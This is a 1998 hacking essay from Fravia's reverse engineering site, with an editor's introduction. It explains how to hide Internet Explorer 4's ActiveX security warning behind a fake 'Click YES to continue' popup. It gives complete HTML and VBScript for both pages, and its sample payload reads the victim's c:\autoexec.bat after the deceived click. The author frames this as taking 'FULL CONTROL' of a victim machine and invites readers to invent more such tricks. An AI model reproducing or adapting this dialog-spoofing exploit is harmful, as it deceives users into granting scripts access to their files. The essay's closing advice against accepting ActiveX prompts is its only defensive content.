Behind the window
How to bypass Micro$oft Internet Explorer security

student
Not Assigned

10 July 1998

by Cryptopoulos

Courtesy of Fravia's page of reverse engineering

slightly edited
by Fravia+

fra_00xx
980710
Cryptopoulos
0100
NA
PC

HTML cracking! How else should we describe this nice essay by Cryptopoulos? Yes, it's easy stuff... once you have read it! Note also how some other tricks on the same light of thought could be used to implement even more subtile games... ok, I'm hopening an anti-MSIE contest right now: all readers that will send me the more innovative (and clever) implementations of this kind of tricks will not only get their essay published, but will also win one of the faboulous strategic gamez from the secret +HCU vault! Let's start a new section: anti-MSIE wars, and now enjoy this essay by Cryptopoulos!

 
 

There is a crack, a crack in everything That's how the light gets in

 

Rating

(x)Beginner (x)Intermediate ( )Advanced ( )Expert

 



Behind the window
How to bypass Micro$oft Internet Explorer security
Written by Cryptopoulos

Introduction

When you click "YES" are you really responding to the true message box ?
This essay will show you how to bypass Micro$oft Internet Explorer security
using a very simple technique.    

Tools required

Text editor

Target's URL/FTP

Micro$sotf Explorer Navigators (4.0 , I have not tested 3.x)

Essay

When Micro$oft Internet Explorer detects that a Visual Basic Script included in an HTML page will access your file system a security alert dialog is displayed :

An ActiveX object on this page may be unsafe.
Do you want to allow it to initialize and be accessed by scripts ?

Nobody with a minimum knowledge about ActiveX and VB Scripts would accept this dialog. If you click the "yes" button you have given FULL CONTROL of your machine to the VB Script code.

This essay will show you how to hide this dialog box and get FULL CONTROL over the victim machine.

The idea is very simple : just display a window over the security alert hiding the message and replacing it by another friendly message but keeping visible the buttons of the original message.

To do this you need to create two HTML pages the first one with the code you want to execute in the victim machine and the second one with the message overlapping the security alert.

Below is the HTML sample code to display the "autoexec.bat" file in the HTML document :

<html>
<head>
<title>ActiveX Bug</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form method="POST" name="form1">
<p><textarea rows="24" name="S1" cols="85"></textarea></p>
</form>
<p><script language="VBScript">
set wcover = window.open ("welcome.htm", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no")
Set fs = CreateObject("Scripting.FileSystemObject")
wcover.close
Set myfile = fs.OpenTextFile("c:\autoexec.bat")
content = myfile.readall
myfile.Close
document.form1.s1.value = content
</script> </p>
</body>
</html>

The welcome.htm page with the nice message is like this :

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>welcome</title>
</head>
<body bgcolor="#C0C0C0">
<div align="left">
<table border="0" width="306" height="62">
<tr>
<td width="300" height="56"><p align="center"><strong>!!! You are Welcome !!!</strong></p>
<p align="center"><strong>Click YES to continue</strong></td>
</tr>
</table>
</div>
</body>
</html>

Lets comment the code :

The instruction below will create the window hiding the security alert :

set wcover = window.open ("welcome.htm", "Welcome . . . )

Next instruction will generate the security alert because we are accesing the file system this prompt will be behind the welcome window :

Set fs = CreateObject("Scripting.FileSystemObject")

If the YES button is clicked we win .
Welcome window in no longer needed and we close it

wcover.close

At this point we are the owners of the machine as an example I will get the autoexec.bat file and display it in a text box. But you can do anything you want.

Set myfile = fs.OpenTextFile("c:\autoexec.bat")
content = myfile.readall
myfile.Close
document.form1.s1.value = content

 

Final Notes

Never accept ActiveX scripts !!!
Before respond a dialog box think about the window behind .  

 

Ob Duh

Ob duh doesn't apply man, we are just pointing out orrible bugs inside M$IE, people should thank us!


You are deep inside Fravia's page of reverse engineering, choose your way out:
redhomepage redlinks redsearch_forms red+ORC redstudents' essays redacademy database
redreality cracking redhow to search redjavascript wars
redtools redanonymity academy redcocktails redantismut CGI-scripts redmail_Fravia
redIs reverse engineering legal?